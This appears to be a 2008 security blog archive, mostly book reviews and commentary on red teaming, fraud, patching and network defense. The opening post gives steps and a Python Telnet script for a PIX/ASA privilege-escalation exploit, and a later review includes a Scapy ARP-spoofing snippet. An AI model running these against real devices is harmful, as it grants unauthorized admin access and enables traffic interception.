Tuesday, 29 January 2008

PIX/ASA Finesse 7.1 & 7.2 Privilege Escalation

I was trying to get into admin mode without the enable password during a penetration test, and I came across a post by Terry describing a design flaw in the PIX/ASA Finesse operating system, versions 7.1 and 7.2. The flaw makes it possible to escalate a normal level 0 user to a level 15 privileged user. The exploit is simple, but it only works at the local console or remotely over Telnet. Note that it will NOT work if SSH, TACACS or RADIUS is implemented on the firewall. Below are the steps.

1. Log in with your level 0 user account. Once logged in, you will be prompted to enter the enable password, which is the privileged-mode password.

2. At this prompt, move the cursor forward by typing a space or another character (it doesn't matter if there is more than one), then delete what you typed, holding down backspace for a second after deleting the last character. It should immediately drop you into level 15 privileged-exec mode.

I tested this on a PIX 515E running Finesse version 7.2, and also on a PIX 525.
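
If you want to replay the keystroke sequence over Telnet without typing it by hand, something like the Python sketch below should come close. Treat it as a rough sketch only: the address, password, prompt strings, and whether the terminal sends 0x7f or 0x08 for backspace are all my assumptions, not tested values, so adjust them for your own lab.

    import telnetlib  # Python standard library (deprecated; removed in 3.13)

    HOST = "192.0.2.1"         # hypothetical firewall address
    LOGIN_PW = b"level0pass"   # hypothetical level 0 Telnet password
    BS = b"\x7f"               # backspace; some terminals send b"\x08" instead

    tn = telnetlib.Telnet(HOST, 23, timeout=10)
    tn.read_until(b"Password:", timeout=5)   # adjust prompt strings to your config
    tn.write(LOGIN_PW + b"\r\n")
    tn.read_until(b">", timeout=5)           # level 0 user-exec prompt
    tn.write(b"enable\r\n")
    tn.read_until(b"Password:", timeout=5)   # the enable password prompt
    # Step 2 from above: type a space, then send more backspaces than
    # characters typed, mimicking holding backspace down past the last one.
    tn.write(b" " + BS * 10 + b"\r\n")
    reply = tn.read_until(b"#", timeout=5)   # a "#" prompt means privileged-exec
    print(reply.decode(errors="replace"))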

The Hacka Man

TSA Lessons for Security Analysts

In the past I've run several security teams, such as the Air Force CERT's detection crew and the MSSP division of a publicly traded company. In those positions I was always interested in assessing the performance of my security analysts. The CNN article TSA tester slips mock bomb past airport security contains several lessons which apply to this domain.

Jason, a covert tester for the Transportation Security Administration, has been probing airport weaknesses for five years, beginning with big mock bombs before switching to ever smaller devices as the TSA adapts to evolving terrorist threats...

Even before the September 11, 2001, terror attacks, government agencies deployed "red teams" such as this one to look for holes in airport security...

But instead of running from tests, the agency has embraced the idea that testing has a value that goes beyond measuring the performance of individual screeners.

Tests, the TSA says, can show systemwide security vulnerabilities...

[S]creeners who fail to detect contraband are "pulled off the line" and retrained before being allowed back.

The test CNN witnessed was conducted by the TSA's Office of Inspection, which the agency calls the most sophisticated of its covert tests. But there are others.

For starters, every TSA X-ray machine has a Threat Image Projection system, which digitally inserts images of guns, knives and bombs into the X-rays of luggage, to keep screeners alert...

If screeners observe a suspicious object, they can check with the simple click of a computer mouse. If they detect a threat object, the computer congratulates them. Successes and failures are recorded for use in a screener's performance evaluation and are factors in determining pay.

Some 69,929 threat image tests are conducted on an average day, or more than 25 million tests per year. An array of other tests also are conducted to assess screeners, including the red team ones.


I've described elsewhere why I support red teams. I certainly recognize that one of my Three Wise Men savages red teams, but I've never seen anything else -- short of an actual incident -- make a dent in the attitudes of management. Furthermore, red teaming, as a real-life test, tends to discover and link vulnerabilities in ways not anticipated by some vulnerability assessors (blue teams) and general security architects. There's no ground truth like saying "I accomplished the mission using this method" when someone is claiming their network is "secure."

I also like the method to test analysts by inserting false images. Fighting analyst boredom is a big problem in some operational teams.

From Linux to FreeBSD with Depenguinator 2.0

If you read Colin Percival's blog you will notice he posted a message about Depenguinator 2.0. This is a method to convert a Linux system to FreeBSD remotely. Colin tested the script using Ubuntu 7.10. I have a few Red Hat 8.0 systems and one or more Fedora Core 4 systems that I would like to convert to FreeBSD 7.0.

I tried using Depenguinator 2.0 to convert a test CentOS 5.1 system to FreeBSD 7.0, but I ran into multiple problems. These included difficulty installing Depenguinator dependencies and possible interference from SELinux capabilities.

If someone wants to try testing Depenguinator 2.0 on a Red Hat 8.0 system or a Fedora Core 4 system, please do so and let me know how it goes. Thank you.

Monday, 28 January 2008

NoVA Sec Meeting 1930 Thu 31 Jan 08

I was determined to start 2008 right by having a NoVA Sec meeting in January. Thursday night is our last chance, but thanks to last-minute coordination with Dowless and Associates we have a meeting location.

The next NoVA Sec meeting will take place 1930 Thursday 31 January 2008 at Dowless and Associates:

13873 Park Center Rd.
Suite 450
Herndon, VA 20171

Devin will speak and demo his One Laptop Per Child (OLPC) box.

Our host is requesting a list of names of attendees, so please RSVP via email (taosecurity at gmail dot com) by end of day Wednesday 30 January 2008. Thank you.

Remember, there are no dues and no requirements for membership. We do leave certifications, FISMA, the certification and accreditation (C&A) process, and related items in the parking lot.

Note: I am only cross-posting this one NoVA Sec announcement because it has been a while since we held a NoVA Sec meeting. I will post future announcements only on the NoVA Sec blog and mailing list.

Sunday, 27 January 2008

Is Jerome Kerviel Hacking?

If you read the headline of today's Washington Post story French Bank Says Trader Hacked Computers you might get the impression that Société Générale trader Jerome Kerviel is some kind of shellcoding ninja, Web 2.0 JavaScript samurai, or at the very least a script kiddie who can run Metasploit with the best of the certified ethical hackers. The truth of the matter is probably mixed. Kerviel is most likely a fraudster who took advantage of trading processes and controls.

The best source I've found so far is the Reuters article FACTBOX: Rise and fall of the SocGen rogue trader. It outlines the fraud thus:

* The alleged fraud, as outlined by the bank, included a genuine long position in regulated stock market index futures, contracts bought in the hope that prices would rise.

* Usually an arbitrageur hedges such a long position with an equal and opposite sale, or short position, reaping a profit from any gaps between the values of the two transactions.

* The SocGen trader did hedge the first position with a second, but the trades in that portfolio were fake. So the bank was unwittingly holding long futures positions without cover, leaving it exposed to the risk that prices would fall.

* To evade controls, for the second portfolio he chose unregulated over-the-counter derivatives which do not need a downpayment, including forward contracts.

* Because there was no downpayment, or margin, these trades were not subject to the same immediate checks as the real futures positions held in the first portfolio.

* Since the real and fake trades balanced each other out, SocGen says its computers perceived "low residual risk" overall.

* As the market turned against him, he sought to cover up mounting losses to avoid further tiers of compliance checks.


The only "computer" angle (besides tricking the controls which measure risk) involved the following:

* The bank alleges that he misappropriated computer passwords and faked documents.

"Misappropriating computer passwords" could be accomplished by using shared accounts, accounts on sticky notes, or any of the other poor practices used in group settings.

Lending credence to the computer angle is this Wall Street Journal story:

According to Mr. Bouton, the Société Générale chairman, Mr. Kerviel began conducting fraudulent trades sometime in 2007. People familiar with Mr. Kerviel's behavior believe he worked late into the night, essentially burrowing into Société Générale's computers, as he allegedly built a multilayered way to hide his trades by hacking into the computer systems.

Société Générale's computer systems are considered some of the most complex in banking for handling equity derivatives, that is, investment contracts whose value moves with the value of other assets. Officials of the bank believe Mr. Kerviel spent many hours of hacking to eliminate controls that would have blocked his super-sized bets. Changes he is said to have made enabled him to eliminate credit and trade-size controls, so the bank's risk managers couldn't see his giant trades on the direction of indexes.


If we focus on what Kerviel is alleged to have done, rather than how it is described, it's possible the "elimination of controls" via "changes" could be considered "hacking."

Let's see what happens! The only good aspect of this intrusion is that the investigation report should be public, because the offender is going to be prosecuted.

Saturday, 26 January 2008

Corporate Digital Responsibility

I've started listening to the Economist Audio Edition on my iPod while running. Last week I listened to a special report on Corporate Social Responsibility. I was struck by the language used and issues discussed in the report. Here are a few excerpts.

First, from Just good business:

Why the boom [in CSR initiatives]? For a number of reasons, companies are having to work harder to protect their reputation — and, by extension, the environment in which they do business...

CSR is now made up of three broad layers, one on top of the other. The most basic is traditional corporate philanthropy... [T]he second layer of CSR... is a branch of risk management... So, often belatedly, companies respond by trying to manage the risks. They talk to NGOs and to governments, create codes of conduct and commit themselves to more transparency in their operations. Increasingly, too, they get together with their competitors in the same industry in an effort to set common rules, spread the risk and shape opinion.

All this is largely defensive, but companies like to stress that there are also opportunities to be had for those that get ahead of the game. The emphasis on opportunity is the third and trendiest layer of CSR: the idea that it can help to create value...

That is just the sort of thing chief executives like to hear... Businesses have eagerly adopted the jargon of “embedding” CSR in the core of their operations, making it “part of the corporate DNA” so that it influences decisions across the company.

With a few interesting exceptions, the rhetoric falls well short of the reality.


Next, from The next question: Does CSR work?:

Three years ago a special report in The Economist acknowledged, with regret, that the CSR movement had won the battle of ideas. In the survey by the Economist Intelligence Unit for this report, only 4% of respondents thought that CSR was “a waste of time and money”. Clearly CSR has arrived...

[In one sense], the best form of corporate responsibility boils down to enlightened self-interest. And the more that firms embracing it are seen to be successful — through astutely managing risks and recognising opportunities — the more enlightened their leaders will be perceived to be. But do such policies really help to bring success? If not, the whole CSR industry has a problem. If people are no longer asking “whether” but “how”, in future they will increasingly want to know “how well”. Is CSR adding value to the business?

At present few companies would be able to tell. CSR decisions rely more on instinct than on evidence. But a measurement industry of sorts is springing up. Many big firms now publish their own sustainability reports, full of targets and commitments. The Global Reporting Initiative, based in Amsterdam, aspires to provide an international standard, with 79 indicators that it encourages companies to use. This may be a useful starting point, but critics say it often amounts to little more than box-ticking; worse, it can provide a cover for poor performers...


From A stitch in time: How companies manage risks to their reputation:

Business leaders embrace corporate responsibility for a number of reasons... For some, though, it is public embarrassment and lawsuits that concentrate the mind... Trouble seems to come in waves, pounding industry after industry, each time for a different reason... Most of the rhetoric on CSR may be about doing the right thing and trumping competitors, but much of the reality is plain risk management. It involves limiting the damage to the brand and the bottom line that can be inflicted by a bad press and consumer boycotts, as well as dealing with the threat of legal action...

Time and again companies fail to see the problems coming. Only once they have had to deal with, say, a lawsuit or strong public pressure do they start to change their thinking...

For the moment, though, the biggest problem many companies have to deal with is something that has sprung from rapid globalisation. It is the risks associated with managing supply chains that spread around the world, stretching deep into China, India and elsewhere...

Firms can set standards of behaviour for suppliers, but they do not find it easy to enforce them... So inspection regimes are set to intensify, at a time when audit fatigue has already become a problem for suppliers...

Each industry has its own specific issues, but there are some common themes in how firms are approaching the risk-management side of CSR. One is to put in place proper systems for monitoring risk across the supply chain, including listing who the suppliers are, having well-established channels of communicating with them and auditing their compliance with ethics codes. Basic as it sounds, even many big companies fail to do this...

Beyond the basics, prudent companies include a CSR perspective when considering new projects...

Novo Nordisk, a Danish company that supplies a big share of the world's insulin, has written the “triple bottom line” — that is, striving to act in a financially, environmentally and socially responsible way — into its articles of association...


Finally, from Do it right:

One way of looking at CSR is that it is part of what businesses need to do to keep up with (or, if possible, stay slightly ahead of) society's fast-changing expectations. It is an aspect of taking care of a company's reputation, managing its risks and gaining a competitive edge. This is what good managers ought to do anyway. Doing it well may simply involve a clearer focus and greater effort than in the past, because information now spreads much more quickly and companies feel the heat...

If it is nothing more than good business practice, is there any point in singling out corporate social responsibility as something distinctive? Strangely, perhaps there is, at least for now. If it helps businesses look outwards more than they otherwise would and to think imaginatively about the risks and opportunities they face, it is probably worth doing. This is why some financial analysts think that looking at the quality of a company's CSR policy may be a useful pointer to the quality of its management more generally...

[I]n a growing number of companies CSR goes deeper than that and comes closer to being “embedded” in the business, influencing decisions on everything from sourcing to strategy. These may also be the places where talented people will most want to work.

The more this happens, ironically, the more the days of CSR may start to seem numbered. In time it will simply be the way business is done in the 21st century. “My job is to design myself out of a job,” says one company's head of corporate responsibility...


Is it obvious by now that you could replace CSR in all of these cases with "digital security"? Is it now time for a "quadruple bottom line" -- "striving to act in a financially, environmentally, socially, and digitally responsible way"?

We in the digital security field need to talk to these CSR people and figure out how they are making progress. We share almost exactly the same goals but they are winning the battle of ideas. In digital security, too many companies "fail to see the problems coming. Only once they have had to deal with, say, a lawsuit or strong public pressure do they start to change their thinking."

Note: Prior to this blog post the only mention of "corporate digital responsibility" I could find via Google is an SEC filing for Bank Bradesco.

Thursday, 24 January 2008

Review of The Best of FreeBSD Basics Posted

Amazon.com just posted my four star review of The Best of FreeBSD Basics by Dru Lavigne. From the review:

In mid-2004 I reviewed Dru Lavigne's book BSD Hacks, which I really enjoyed. 3 1/2 years later I am pleased to say that Dru's latest book, The Best of FreeBSD Basics (TBOFB), is another excellent resource for FreeBSD users. I really wish this book had been available in 2000 when I started using FreeBSD! If you are a beginner to intermediate FreeBSD user, you will find this book invaluable. If you are an advanced user, you may find a helpful tip or two as well.

Sunday, 20 January 2008

Review of Time Based Security Posted

Amazon.com just posted my three star review of Time Based Security by Winn Schwartau. From the review:

Time Based Security (TBS) was largely written 10 years ago. The author gave me a copy about 3 years ago at a security conference. What's remarkable about the concept of TBS is that it was as relevant 10 years ago as it is today. The "risk avoidance" idea and "fortress mentality" described in TBS are as prevalent in this decade as they were in the 1990s, and they continue to fail us. TBS, as an alternative approach, is a powerful way to estimate the security posture of an asset. However, TBS the book is not the best way to make this argument (hence the three star rating). I would like to see TBS (published in 1999, but including older material) rewritten as a tenth anniversary edition and released in digital format, perhaps as a digital Short Cut.
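
For readers new to the concept, the core of TBS fits in one inequality: a protective measure only works while the time it buys, P, exceeds detection time D plus reaction time R. Here is a toy calculation, with numbers I made up, showing how the estimate works:

    # Time Based Security in one inequality: you are protected only while
    # P (protection time) > D (detection time) + R (reaction time).
    # All values below are hypothetical, in seconds.
    P = 60 * 60    # the control resists the attacker for an hour
    D = 10 * 60    # we detect the attack after ten minutes
    R = 30 * 60    # we react thirty minutes after detecting
    exposure = max(0, (D + R) - P)   # time the asset sits exposed
    print("protected" if P > D + R else "exposed for %d seconds" % exposure)

With these numbers the asset is protected; cut P to fifteen minutes and you can quantify the exposure window instead of arguing about whether the asset is "secure."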

I recommend reading the whole review. I heavily quoted the parts I liked. I also just updated the links in my 2005 post Where in the World Is Winn Schwartau?.

More on 2008 Predictions

In Predictions for 2008 I included the following:

3) Expect increased awareness of external threats and less emphasis on insider threats. Maybe this is just wishful thinking, but the recent attention on botnets, malware professionalization, organized criminal cyber enterprises, and the like seems to be helping direct some attention away from inside threats. This may be premature for 2008, but I expect to see more coverage of outsiders again.

Today I saw the SANS Top Ten Cyber Security Menaces for 2008. (I thought using the term "menace" neatly sidesteps trying to classify these items using traditional terms, since the list mixes threats, attacks, tools, and so on.) Here is the "consensus list," according to 12 "cyber security veterans," in ranked order:

  1. Increasingly Sophisticated Web Site Attacks That Exploit Browser Vulnerabilities - Especially On Trusted Web Sites

  2. Increasing Sophistication And Effectiveness In Botnets

  3. Cyber Espionage Efforts By Well Resourced Organizations Looking To Extract Large Amounts Of Data - Particularly Using Targeted Phishing

  4. Mobile Phone Threats, Especially Against iPhones And Android-Based Phones; Plus VOIP

  5. Insider Attacks

  6. Advanced Identity Theft from Persistent Bots

  7. Increasingly Malicious Spyware

  8. Web Application Security Exploits

  9. Increasingly Sophisticated Social Engineering Including Blending Phishing with VOIP and Event Phishing

  10. Supply Chain Attacks Infecting Consumer Devices (USB Thumb Drives, GPS Systems, Photo Frames, etc.) Distributed by Trusted Organizations


I've written before that I am not a big fan of expert opinions, but this is a generic list that does not try to "measure risk" for a particular organization. I still prefer alternatives, but I find it fascinating that the big bad insider is listed as number 5. Every other item is arguably an outsider problem, as my prediction stated. The first three are absolutely outsider-based. I take all of this as a good sign that the tide is turning (again).

Saturday, 19 January 2008

Thoughts on Oracle Non-Patching

Thanks to SANS Newsbites (probably the best weekly security round-up around) for pointing me to the story Two-thirds of Oracle DBAs don't apply security patches. They are all citing this Sentrigo press release, which I will quote directly:

Sentrigo, Inc., an innovator in database security software, today announced survey results indicating that most Oracle database administrators do not apply the Critical Patch Updates (CPUs) that Oracle issues on a quarterly basis...

When asked: “Have you installed the latest Oracle CPU?” – Just 31 people, or ten percent of the 305 respondents, reported that they applied the most recently issued Oracle CPU.

When asked: “Have you ever installed an Oracle CPU?” – 206 out of 305 OUG attendees surveyed, or 67.5 percent of the respondents said they had never applied any Oracle CPU.


Of course, Sentrigo has a business reason for reporting these figures:

Sentrigo created Hedgehog, a host-based database activity monitoring and protection software solution, to detect and prevent unauthorized database use by hackers and company insiders. Hedgehog’s unique virtual patching ability immediately protects databases against vulnerabilities that have been discovered, but not yet patched, as well as against zero-day exploits of certain types.

Hedgehog installs on the database server itself, unlike a product such as BlueLane which is network-based.

When I read a story like this, it shows me that shops running Oracle servers in such a configuration have effectively decided to avoid the resistance phase of security operations. (Others call this "protection" or "prevention," but since all such measures are ultimately doomed I prefer using "resistance.") All that's left is detection and response. Somehow I don't think companies that have never installed an Oracle CPU are devoting extra resources to detection and response.

However, I consider it a valid strategy to spend more time on detection and response if the cost of resisting is considered to be too high. (I am probably being generous here.) Detection and response is the only viable strategy when confronting the most advanced and persistent threats, because no degree of resistance will prevent compromise.

In shops where patching is never done, the only event which could possibly convince a database administrator and his/her management to apply patches would be a severe incident. If, however, you don't bother devoting resources to detection, you may never know you were compromised. It's disappointing how that works. At some point your breach may make the papers, but right now there's still a pervasive attitude that "it won't happen to us."

At the end of the day I remain convinced that building visibility in (BVI), then using that visibility to build rapid and skilled detection and response capabilities, is the best we can do. Of course I would like to see the government and commercial building security in (BSI) initiatives make progress, since their success means less work on more routine intrusions for CSIRTs. However, BSI without BVI leaves us in the same state we find ourselves now, except the intrusion methodologies will have moved "up the value chain."

Is This For Real?

I'm not sure if this is real: CIA Admits Cyberattacks Blacked Out Cities:

The CIA on Friday admitted that cyberattacks have caused at least one power outage affecting multiple cities outside the United States.

Alan Paller, director of research at the SANS Institute, said that CIA senior analyst Tom Donahue confirmed that online attackers had caused at least one blackout...

Paller said that Donahue presented him with a written statement that read, "We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands. We suspect, but cannot confirm, that some of these attackers had the benefit of inside knowledge. We have information that cyberattacks have been used to disrupt power equipment in several regions outside the United States. In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."


Two points: 1) This statement mentions cities outside the US, not inside. 2) Since when does the CIA release information like this in a letter to SANS?

Friday, 18 January 2008

2008 Predictions Panning Out

Almost one month ago I wrote Predictions for 2008. They included "2) Expect greater military involvement in defending private sector networks" and "4) Expect greater attention paid to incident response and network forensics, and less on prevention."

Relevant to number 2, today I read Intelligence Chief Proposes Wide Cyber Surveillance, which says:

US National Intelligence Director says government should be able to tap all email, file transfers, and Web searches...

In an interview scheduled to be published in Monday's forthcoming edition of The New Yorker, McConnell offers some insight into his long-awaited draft U.S. Cyber-Security Policy...

To accomplish his plan, the government must have the ability to read all the information crossing the Internet in the United States -- in order to protect it from abuse.

The plan gives government agencies the right to monitor email, file transfers, and even Web searches, according to reports. McConnell's proposals also include reducing the number of gateways between government computers and the Internet from 2,000 to 50, as well as implementing a dragnet to monitor electronic traffic.


Relevant to number 4, today I read Tech Insight: Incident Response, which says:

Incident response (IR) for many IT shops traditionally has been accomplished by cobbling together tools from various sources with a script-based tool that automates the collection of data from the suspect system. An IR team member or help desk technician is sent to investigate a problem, with a USB thumb drive in hand that contains the collection of tools. The tools are then run, and the output analyzed to detect the source of the suspicious behavior. It’s neither a quick nor efficient process.

All manual incident response is slow response, says Kevin Mandia, president and CEO of Mandiant. A key driver for organizations dealing with incidents, especially those in the financial sector, Mandia says, is speed and minimizing exposure: The IR team must be able to quickly grab information about the incident, determine what’s happening, and respond appropriately to minimize collateral damage...

With new products on the horizon, IT groups looking to streamline their current IR practices, or to simply start an IR program for the first time, should keep an eye on evolving products and new releases due out within the next month.


I plan to visit MANDIANT and HBGary within the next month. I have trial software from Technology Pathways to test. I have a copy of NetWitness Investigator Field Edition in my lab kit now. I have copies of AccessData FTK 2.0 and Guidance Software EnCase Forensic en route. There's a lot happening in the IR and forensic space, so I think 2008 will be a big year.

Review of Security Power Tools Posted

Amazon.com just posted my four star review of Security Power Tools by a team of authors, mostly from Juniper. From the review:

I am probably the first reviewer to have read the vast majority of Security Power Tools (SPT). I do not think the other reviewers are familiar with similar books like Anti-Hacker Toolkit, first published in 2002 and most recently updated in a third edition (AHT3E) in Feb 2006. (I doubt the SPT authors read or even were aware of AHT3E.) SPT has enough original material that I expect at least some of it will appeal to many readers, justifying four stars. On the other hand, a good portion of the material (reviewed previously as "the most up-to-date tools") offers nothing new and in some cases is several years old.

Thursday, 17 January 2008

Reminder: Bejtlich Teaching at Black Hat DC 2008 Training

I just wanted to remind interested readers that Black Hat was kind enough to invite me back to teach TCP/IP Weapons School at Black Hat DC 2008 on 18-19 February 2008, at the Westin Washington DC City Center. This is currently my only scheduled training class in 2008. As you can see from the course description I will focus on OSI model layers 2-5 and add material on network security operations, like monitoring, incident response, and forensics. The cost for this single two-day class is now $2200 until 8 February (three weeks from now), when online registration closes and the price increases to $2400. Register while seats are still available -- both of my sessions in Las Vegas sold out. Thank you.

Snort Frequently Asked Questions Podcast Posted

About a month ago I recorded a podcast for SearchSecurityChannel.com. It's a series of frequently asked questions. SSC is for the "channel," which means "vendors," but everything in the podcast applies to Snort operators. You should be able to reach the podcast via this link. Note that when I recorded the podcast we didn't know that Emerging Threats would be replacing Bleeding Threats.

Tuesday, 15 January 2008

Web Attacker Toolkit

Sorry for the lack of updates. I've been roaming around for the past two months and felt a little lazy about updating my blog. Reading news on the Internet today, I came across a story about a hacking toolkit that has been able to compromise thousands of web servers, which caught my attention. Apparently the tool, called the "Web Attacker Toolkit," can be bought cheaply from a Russian hacking group called Inex-Lux. Unpatched IE and Firefox browsers can be compromised, with a trojan silently installed on the local PC without the user knowing it. Once the trojan is installed, the game is over. After reading the news, of course I upgraded my IE and Firefox to the latest versions to avoid exploitation. Check out the three links below:

http://www.informationweek.com/news/showArticle.jhtml?articleID=186700539

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=472

http://informationweek.com/news/showArticle.jhtml?articleID=205603044

The Hacka Man

Monday, 14 January 2008

Unposted Review: Network Security Assessment 2nd Ed

I wrote a four star review of the first edition of Network Security Assessment by Chris McNab in May 2004. I read the second edition and tried to post a three star review at Amazon.com. Unfortunately, Amazon.com would not let me post a new review because I had reviewed the first edition. Therefore, here is my review:

In May 2004 I reviewed the first edition of Network Security Assessment (NSA1). Almost four years later, the second edition (NSA2) is basically the same book. This makes sense, given the majority of the action in digital security over the last 5-6 years has occurred at the application layer, not the network layer. (For reference, OWASP -- the Open Web Application Security Project -- was created in 2002.) The end result is the material in NSA2 is a foundation for higher level assessments. While NSA2 contains chapters on Assessing Web Servers and Assessing Web Applications, it doesn't devote enough depth to change the focus of the book.

In some ways NSA2 is a step backward from NSA1. First, I liked the end-to-end case study in NSA1. The case study applied the author's methodology in a simulated customer assessment. I prefer reading that sort of material to a list of tools. Unfortunately, the case study is gone in NSA2. Second, NSA2 wastes too many pages on tables enumerating CVE entries for vulnerabilities in various applications. A directive to the reader to check CVE or a similar Web site directly would have been better. Third, the appendices really add nothing but filler. Similar to the CVE listings, it's not necessary to waste paper printing the vulnerabilities exploited by CANVAS, CORE IMPACT, and Metasploit.

Because NSA2 markets itself as a "network security assessment" book, I think the author should have focused on layers 1-4 and left 5-7 for other books. I accept that the author chose not to discuss wireless issues, since that medium has entire books devoted to it. However, I was disappointed that NSA2 decided to once again start at layer 3. If you're going to write a network book, why not address layer 2 attacks? Are all assessments done remotely, with only layer 3 available? (I sketch an example layer 2 check after this review.)

NSA2 does update material from NSA1, and adds some new items. I think NSA2 would be a good book for a PCI auditor who sticks to his/her script and ensures the basics are covered. Those looking for a thorough assessment are going to spend time in areas (like Web apps) not well-covered in NSA2.

I recommend reading my May 2004 review of the first edition, because most of that review still applies to NSA2. At this point people wanting to read this sort of material should probably turn to the Hacking Exposed series. I like the approach taken in HE, because there is a core book that is augmented by domain-specific books (Windows, Web 2.0, Linux, etc.).
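
To make the layer 2 point concrete, here is the kind of check I have in mind, sketched in Python with Scapy. This is my illustration, not material from NSA2, and the addresses are placeholders; only run tests like this on a segment you are authorized to assess. It sends unsolicited ARP replies claiming the gateway's IP; if the target's ARP cache updates, the segment is open to man-in-the-middle attacks.

    from scapy.all import ARP, Ether, sendp  # requires scapy and root privileges

    # Hypothetical lab addresses.
    target_ip  = "192.0.2.10"
    target_mac = "00:11:22:33:44:55"
    gateway_ip = "192.0.2.1"

    # op=2 is an ARP reply ("is-at"). Scapy fills in our MAC as the source,
    # so a target that accepts it maps the gateway IP to our interface.
    poison = Ether(dst=target_mac) / ARP(op=2, psrc=gateway_ip,
                                         pdst=target_ip, hwdst=target_mac)
    sendp(poison, iface="eth0", count=5, inter=2)  # five replies, two seconds apart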

Thursday, 10 January 2008

Defensible Network Architecture 2.0

Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible.

I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements from least likely to most likely to encounter resistance from stakeholders.

A Defensible Network Architecture is an information architecture that is:

  1. Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001. (A toy session-data example appears after this list.)

  2. Inventoried. This means knowing what you host on your network. If you've started monitoring, you can acquire a lot of this information passively. This is new to DNA 2.0 because I previously assumed it would already have been done. Fat chance!

  3. Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this any way you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is that you transition from an "anything goes" network to one where activity is authorized in advance, if possible. This step marks the first point where stakeholders might start complaining.

  4. Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it.

  5. Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what.

  6. Assessed. This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. Assessment is the step where you decide if what you've done so far is making any difference.

  7. Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0.
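
As promised in step 1, here is a minimal sketch of what session data means at the "absolute minimum" level: collapsing packets into per-flow records. Real sensors do far more; this Python/Scapy toy, with a placeholder pcap file name, just tallies packets per 5-tuple.

    from collections import Counter
    from scapy.all import rdpcap, IP, TCP, UDP  # scapy must be installed

    sessions = Counter()
    for pkt in rdpcap("capture.pcap"):   # placeholder pcap file name
        if IP not in pkt:
            continue
        l4 = TCP if TCP in pkt else UDP if UDP in pkt else None
        sport, dport = (pkt[l4].sport, pkt[l4].dport) if l4 else (0, 0)
        # Count packets per 5-tuple; real sensors also track bytes and times.
        sessions[(pkt[IP].src, sport, pkt[IP].dst, dport, pkt[IP].proto)] += 1

    for flow, count in sessions.most_common(10):
        print(flow, count)

Even output this crude tells you who talked to whom, over what service, and how much -- the foundation for every later step.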


So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly.

Did I miss anything?

How can a blog reader find competent operations personnel?

I received the following question from a blog reader. I am interested in hearing what you think.

I'm team lead for a small private-sector security operations team. We are fortunate that we have a reasonably interesting and attractive work environment, readily available financial resources, and a relatively manageable event load.

We've been trying to hire a mid to senior level analyst position for at least a year now, and have been having absolutely no luck whatsoever.

The job responsibilities mainly consist of analyzing events from the SEM and NSM stacks, documenting and resolving incidents, and conducting regular vulnerability management operations.

A majority of the applications we get seem to come from security "architects" who may have some product deployment experience, but little to no applicative analysis skills necessary to un-haystack the needles, or pursue an incident to closure.

Very few of the interviewees can even get past the technical phone screen, which consists of the following three questions:

  1. You see an IDS/IPS event in your event console called "some kind of IDS event name here".

    • What would you do to investigate the event, and how would you validate that the event was a real attack and not a false positive?

    • How would you determine if this was a one-off event, or part of an overall pattern?

    • What other kinds of information would you seek out to build a more complete picture of the context around this event?


  2. After having investigated the event, you have gathered enough positive indicators that the actual traffic consisted of a legitimate attack against a server you suspect may be vulnerable to an attack of that kind.


    • How do you determine what may have happened to the server? (This question is usually geared towards whatever platform the candidate might have actual technical experience with.)

    • What would you do if you saw a subsequent event that indicated the target system had downloaded a file from the internet soon after the original IDS event?

    • How could you recover the file? What would you do to analyze it? (This question usually evolves into some platform-specific live forensics, network forensics, and incident response.)


  3. You conduct a vulnerability scan that produces output indicating that server X (operating system Y) may be vulnerable to issue Z.


    • What would you do to validate the finding?

    • How would you validate the finding if the report indicated the issue was present on 100 machines? (This again is usually geared towards a platform that the candidate has the most experience with).

    • What would you do to address the issue?



These three topic areas seem to cut to the core of what raw analysis tasks an operations analyst must be able to perform well. The kinds of answers I expect are specific, detailed, and accurate given the scenarios supplied (i.e. application-level attack against a 3-tier windows-based web application merits one kind of response vs. a client-side buffer overflow attack against a web browser, etc.).

Maybe one or two of our candidates out of several dozen have even been able to answer them competently enough for a second round (and they eventually accepted more lucrative offers). I'd even be happy if the candidates could get two out of three.

